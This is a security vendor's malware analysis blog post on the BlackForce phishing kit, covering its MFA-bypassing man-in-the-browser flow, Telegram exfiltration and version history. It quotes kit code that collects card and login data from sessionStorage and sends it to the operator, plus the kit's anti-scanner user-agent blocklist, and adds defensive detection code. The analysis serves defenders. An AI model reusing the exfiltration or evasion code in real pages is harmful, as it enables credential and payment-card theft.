Zscaler Blog
Technical Analysis of the BlackForce Phishing Kit
Introduction
Zscaler ThreatLabz identified a new phishing kit named BlackForce, which was first observed in the beginning of August 2025 with at least five distinct versions. BlackForce is capable of stealing credentials and performing Man-in-the-Browser (MitB) attacks to steal one-time tokens and bypass multi-factor authentication (MFA). The phishing kit is actively marketed and sold on Telegram forums for €200–€300.
In this blog post, ThreatLabz examines the BlackForce phishing kit, including its evolution, evasion techniques, and architecture. The analysis examines versions 3, 4, and 5 of BlackForce, followed by a comparison highlighting the key differences and advancements across these versions.
Key Takeaways
- In August 2025, ThreatLabz first observed the BlackForce phishing kit, which has been used to impersonate more than 11 brands, such as Disney, Netflix, DHL, and UPS.
- BlackForce facilitates Man-in-the-Browser (MitB) attacks that allow operators to dynamically bypass multi-factor authentication (MFA) in real time.
- BlackForce features several evasion techniques with a blocklist that filters out security vendors, web crawlers, and scanners.
- BlackForce remains under active development. Version 3 was widely used until early August, with versions 4 and 5 being released in subsequent months.
- BlackForce uses a dual-channel communication architecture that separates the phishing server from a Telegram drop, ensuring the stolen data is not lost if the phishing panel is taken down.
Technical Analysis
The following sections provide insight into each stage of BlackForce’s attack chain.
Discovery and code analysis
ThreatLabz began its analysis of BlackForce when we identified a distinct pattern while hunting for phishing campaigns. The suspicious domains consistently used JavaScript files with cache-busting hashes in their names. This led ThreatLabz to the phishing kit's entry point, a single line in the page's HTML source that loads the entire platform.
Cache-busting is a technique in which a hash derived from the file's contents is embedded in the filename, forcing the victim's browser to download the latest version of the malicious script instead of using a cached copy. The code example below illustrates the DOM structure of the malicious webpage, featuring a filename format (index-[hash].js) that is commonly associated with professional build tools.

The most effective deception tactic used by the BlackForce phishing kit is its "legitimate-looking" codebase. Our analysis found that more than 99% of the malicious JavaScript file's content consists of production builds of React and React Router, giving it a legitimate appearance.
Attack chain
The BlackForce attack chain features a vetting system to qualify targets, after which a live operator takes over to orchestrate a guided compromise. The attack chain for this campaign is shown in the figure below.

Figure 1: Attack chain diagram depicting the BlackForce attack flow.
The sequence of events for a BlackForce phishing campaign is as follows:
1. The victim clicks on the phishing link and is directed to an attacker-controlled phishing page.
2. A server-side Internet Service Provider (ISP)/vendor blocklist is applied to the victim's IP address and User-Agent, blocking any traffic identified as a crawler or scanner.
3. After user validation, the phishing page is served and is designed to appear as a legitimate website, as seen in the figure below.

Figure 2: The legitimate-looking phishing page(s) displayed to the victim.
4. The victim, believing the page is authentic, enters their credentials, which are immediately captured by the attacker.
5. The attacker receives real-time victim session alerts and the exfiltrated credentials to their command-and-control (C2) panel alerting them of a live target. The stolen credentials are also sent to the attacker via a Telegram channel, as shown in the figure below.

Figure 3: The attacker’s view of the exfiltrated data being sent to Telegram.
6. The attacker attempts to log into the legitimate target website using the stolen credentials, triggering an MFA authentication prompt.
7. Using MitB attack techniques, the attacker deploys a fake MFA authentication page to the victim’s browser through the C2 panel, as shown in the figure below.

Figure 4: BlackForce control panel for version 3.
8. The victim's browser renders the fake MFA page, and the victim, unaware of the attack, enters their MFA code, as shown in the figure below.

Figure 5: Example BlackForce phishing page that hijacks an SMS code sent to the victim.
9. The attacker captures the MFA code and submits it to the legitimate website, successfully bypassing the MFA process and compromising the victim’s account.
ANALYST NOTE: It is important to note that not all BlackForce phishing campaigns display pages to steal MFA codes, since not all websites use MFA. If the website utilizes MFA, the BlackForce phishing kit’s control panel provides attackers with custom options (based on the target brand) to steal codes that are provided via SMS, card, or app-based authentication.
Once the attack is complete, the victim is redirected to the homepage of the legitimate website, hiding evidence of the compromise and ensuring the victim remains unaware of the attack.
Exfiltration channel
The networking module is the most important part of the BlackForce phishing kit. The attackers use Axios, a popular HTTP client, to manage all communication. Axios instances control the data flow in the kit. Version 3 of BlackForce includes two client-side Axios instances: one for C2 communication and another for exfiltrating data to a hardcoded Telegram channel. In versions 4 and 5 of BlackForce, only the primary C2 instance remains, and the Telegram configuration has been moved to the server-side. The figure below shows the BlackForce control panel used to set up the exfiltration channel for version 5.

Figure 6: BlackForce version 5 configuration for exfiltration settings.
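The version 3 design above has a network-visible side effect: the victim's browser itself calls the Telegram Bot API from a page that is not Telegram's. The detection below is an added example, not code from the ThreatLabz analysis or the kit; it assumes a constructed, simplified proxy-log format and placeholder hostnames, and it only catches version 3, since versions 4 and 5 relay through the kit's backend.

```javascript
// Added example (not from the ThreatLabz analysis): a detection for the version 3
// exfiltration path, in which the victim's browser itself calls the Telegram Bot API.
// Input is web-proxy log lines in a constructed, simplified format:
//   <ISO time> <client-ip> <method> <host> <path> <referer-or-->
const TELEGRAM_API = "api.telegram.org";
const TELEGRAM_OWN_HOSTS = new Set(["telegram.org", "web.telegram.org", "t.me"]);

function parseLine(line) {
  const [ts, client, method, host, path, referer] = line.trim().split(/\s+/);
  return { ts, client, method, host, path, referer: referer === "-" ? null : referer };
}

// Hostname of the page that initiated the request, or null when the Referer header
// was absent or unparseable (e.g. stripped by a strict referrer policy).
function refererHost(referer) {
  if (!referer) return null;
  try { return new URL(referer).hostname; } catch { return null; }
}

// One finding per Bot API sendMessage call whose initiating page is not Telegram's
// own web client. A third-party page driving the browser to /bot<token>/sendMessage
// is the v3 behaviour; a missing referer is still reported, at lower confidence.
// Versions 4 and 5 relay through the kit's backend, so this check does not see them.
function detectBrowserTelegramExfil(lines) {
  const findings = [];
  for (const rec of lines.map(parseLine)) {
    if (rec.host !== TELEGRAM_API) continue;
    if (!/^\/bot[^/]+\/sendMessage(\?|$)/.test(rec.path)) continue;
    const origin = refererHost(rec.referer);
    if (origin && TELEGRAM_OWN_HOSTS.has(origin)) continue;
    findings.push({
      ts: rec.ts,
      client: rec.client,
      suspectedPhishingHost: origin,        // the page to block and hunt for
      confidence: origin ? "high" : "medium",
    });
  }
  return findings;
}

// Constructed sample log; "phish.example.test" and the bot token are placeholders.
const SAMPLE_LOG = [
  "2025-08-05T10:01:02Z 10.0.0.5 GET phish.example.test /assets/index-3f9a1c2b.js -",
  "2025-08-05T10:01:40Z 10.0.0.5 POST api.telegram.org /bot123456:PLACEHOLDER/sendMessage https://phish.example.test/login",
  "2025-08-05T10:02:00Z 10.0.0.7 POST api.telegram.org /bot123456:PLACEHOLDER/sendMessage https://web.telegram.org/",
  "2025-08-05T10:03:00Z 10.0.0.9 POST api.telegram.org /bot123456:PLACEHOLDER/sendMessage -",
  "2025-08-05T10:04:00Z 10.0.0.5 GET api.telegram.org /bot123456:PLACEHOLDER/getMe https://phish.example.test/",
];

for (const f of detectBrowserTelegramExfil(SAMPLE_LOG)) console.log(f);
```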
Anti-analysis filters
The BlackForce phishing kit employs anti-analysis techniques to evade detection and prolong its operational lifespan. The first line of defense is a proactive client-side filter, which attempts to identify non-human visitors the moment they land on the page. This is accomplished with a database of signatures and a parsing engine that processes the visitor's User-Agent string. The code compares the User-Agent against a set of predefined regular expressions to detect web crawlers, security scanners, and SEO tools, as shown in the example below.
  {
    regex: "Nmap Scripting Engine",
    name: "Nmap",
    category: "Security Checker",
    url: "https://nmap.org/book/nse.html",
    producer: {
      name: "Nmap",
      url: "https://nmap.org/"
    }
  },
  {
    regex: "Netcraft( Web Server Survey| SSL Server Survey|SurveyAgent)",
    name: "Netcraft Survey Bot",
    category: "Search bot",
    url: "",
    producer: {
      name: "Netcraft",
      url: "http://www.netcraft.com"
    }
  },
  {
    regex: "MSNBot|msrbot|bingbot|BingPreview|msnbot-(UDiscovery|NewsBlogs)|adidxbot",
    name: "BingBot",
    category: "Search bot",
    url: "http://search.msn.com/msnbot.htmn",
    producer: {
      name: "Microsoft Corporation",
      url: "http://www.microsoft.com"
    }
  },
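To see what the client-side filter actually does with a visitor, the added example below re-implements its matching step with the three signatures quoted above; it is not the kit's own code. It assumes the patterns are compiled as plain, unflagged regular expressions (the kit's compile step is not shown), and the sample User-Agent strings are constructed.

```javascript
// Added example (not BlackForce's own code): re-implements the matching step of the
// kit's client-side User-Agent filter with the three signatures quoted above, so a
// defender can check which of their own tools' User-Agents the page would turn away.
const SIGNATURES = [
  { regex: "Nmap Scripting Engine", name: "Nmap", category: "Security Checker" },
  { regex: "Netcraft( Web Server Survey| SSL Server Survey|SurveyAgent)",
    name: "Netcraft Survey Bot", category: "Search bot" },
  { regex: "MSNBot|msrbot|bingbot|BingPreview|msnbot-(UDiscovery|NewsBlogs)|adidxbot",
    name: "BingBot", category: "Search bot" },
];

// The kit stores patterns as plain strings; compiling them without flags (assumed
// here) makes the match case-sensitive and unanchored, i.e. a substring match.
const COMPILED = SIGNATURES.map((s) => ({ ...s, re: new RegExp(s.regex) }));

// Returns the first matching signature ({ name, category }) or null for a UA that
// passes the filter.
function classifyUserAgent(ua) {
  for (const sig of COMPILED) {
    if (sig.re.test(ua)) return { name: sig.name, category: sig.category };
  }
  return null;
}

// The filter's decision: any signature hit is treated as a non-human visitor.
function isBlocked(ua) {
  return classifyUserAgent(ua) !== null;
}

// Constructed sample User-Agent strings (the first two imitate a scanner and a
// crawler; the third is an ordinary mobile browser).
const SAMPLES = [
  "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)",
  "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
  "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148 Safari/604.1",
];

for (const ua of SAMPLES) {
  const hit = classifyUserAgent(ua);
  console.log(isBlocked(ua) ? "BLOCK" : "ALLOW", hit ? `${hit.name} (${hit.category})` : "-", ua);
}
```

The practical consequence for analysis is that a fetch made with a default scanner or crawler User-Agent never reaches the phishing content, so sandboxes and URL scanners should expect the filtered response rather than the kit itself.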
In versions 4 and 5, the BlackForce C2 server proactively filters all incoming traffic. Version 4 enforces a mobile-only policy that rejects all desktop user agents and cross-references the remaining visitors' user agents, resolved hostnames, and ISPs against a comprehensive blocklist of keywords. Any signature associated with a security scanner or automated crawler results in an immediate redirect to a generic error page. The ISP blocklist for BlackForce version 4 is available in the ThreatLabz GitHub repository.
BlackForce also enforces a list of permitted countries and performs User-Agent profiling to immediately block any identified scanners and crawlers, as shown in the figure below.

Figure 7: Anti-analysis mechanisms implemented in version 5 of BlackForce.
Statefulness
A critical architectural difference separating BlackForce version 3 from its successors is the evolution from a stateless to a stateful attack model. In version 3, the attack was fundamentally fragile because exfiltrated credentials existed only in the browser's active memory. This meant a page refresh or network error could erase the stolen data and break the attack flow. To address this weakness, the author of BlackForce versions 4 and 5 leveraged the browser's sessionStorage to create a persistent, stateful session. This allows BlackForce to "remember" credentials across the entire multi-stage attack. The example below, taken from version 4, demonstrates how previously captured data is retrieved from sessionStorage and exfiltrated with the sendMessage function.
try {
  o(!0);                                     // toggle a loading flag (minified state setter; inferred)
  const m = y.ccn.replace(/\s/g, "");
  sessionStorage.setItem("cc", m);           // persist the card number for later stages
  const x = {
      ccn: y.ccn,
      exp: y.exp,
      cvv: y.cvv,
      // fields captured in earlier stages are read back from sessionStorage
      user: sessionStorage.getItem("user"),
      pass: sessionStorage.getItem("pass"),
      name: sessionStorage.getItem("name"),
      dob: sessionStorage.getItem("dob"),
      city: sessionStorage.getItem("city"),
      phone: sessionStorage.getItem("phone"),
      address: sessionStorage.getItem("address"),
      zip: sessionStorage.getItem("zip")
    },
    C = await pt.sendMessage(x, e, "card"),  // exfiltrate the combined record to the C2
    P = (await pt.getConfig()).data.panel;   // whether the operator panel is enabled
  // on success, clear the loading flag and advance to the "loader" stage (operator-driven)
  // when the panel is enabled, otherwise to "confirm"
  C.data.status === "success" ? (o(!1), n(null), t(P === !0 ? "loader" : "confirm")) : (n(null), o(!1))
}
C2 communication
The BlackForce C2 panel controls every action from the moment a victim lands on the page until their data is stolen. The panel provides a set of asynchronous functions that can be categorized into four distinct roles:
- Functions that identify the visitor, enrich stolen data, and protect the phishing kit from detection.
- Functions responsible for stealing victim data and sending it to the attacker.
- Functions that manage the real-time, interactive flow of the phishing session.
- Administrative functions used by an attacker to manage the attack.
The BlackForce C2 panel for version 5 is shown in the figure below.

Figure 8: BlackForce C2 panel for version 5.
Comparison of BlackForce Versions
The rapid versioning of BlackForce indicates the malware author is actively learning and adapting their tool to improve resilience and evade detection. The table below highlights the differences between the last three versions of BlackForce.
| Feature | BlackForce V3 | BlackForce V4 | BlackForce V5 |
|---|---|---|---|
| Core Architecture | Fully client-side. The entire application logic, including the multi-stage attack flow, is contained within the client's browser. | Hybrid (client-server). The core attack logic is server-side. | Hybrid (client-server). The core attack logic is server-side. |
| State Management | Stateless. Uses active browser memory only. A page refresh would cause all data to be lost. | Stateful. Uses sessionStorage. | Stateful. Uses sessionStorage. |
| Data Exfiltration | A dedicated Axios instance sends stolen data directly from the victim's browser to the Telegram API. | The client sends data to the BlackForce backend. The server is then responsible for relaying that data to Telegram, obscuring the final destination. | The client sends data to the BlackForce backend. The server is then responsible for relaying that data to Telegram, obscuring the final destination. |
| Evasion & Defense | Parses user agents to identify scanners and crawlers. | Uses a robust server-side blocklist for ISP, country, and user agents. | Uses a robust server-side blocklist for ISP, country, and user agents. |
| Obfuscation | None | None | Obfuscated client-side JS code. |
Table 1: A comparison between versions 3, 4, and 5 of BlackForce.
Conclusion
The authors of BlackForce are actively modifying and improving the phishing kit, as evidenced by the rapid release of multiple versions in a short period. The kit allows threat actors to conduct MitB attacks to bypass MFA, which can lead to a full account takeover. Organizations should deploy a zero trust architecture to limit access and minimize the damage that can be caused in such attacks.
Zscaler Coverage
Zscaler’s multilayered cloud security platform detects indicators related to this threat at various levels with the following threat name:
Indicators Of Compromise (IOCs)
Domains
MITRE ATT&CK Framework
| Tactic | ID | Technique name | Description |
|---|---|---|---|
| Initial Access | T1566 | Phishing | Phishing is used to gain initial access to the victim's account. |
| Defense Evasion | T1027 | Obfuscated Files or Information | The file is obfuscated to evade detection and analysis. |
| Credential Access | T1557 | Adversary-in-the-Middle | The attacker positions themselves between the victim and the legitimate website. |
| Credential Access | T1555 | Credentials from Password Stores | Exfiltrates credentials from the web browser credential store. |
| Command and Control | T1665 | Hide Infrastructure | Hides the attacker panel and evades its detection. |
| Exfiltration | T1567 | Exfiltration Over Web Service | Exfiltrates credentials via the Telegram web service. |
| Impact | T1657 | Financial Theft | Exfiltrated credentials can be used to steal monetary resources from the victim. |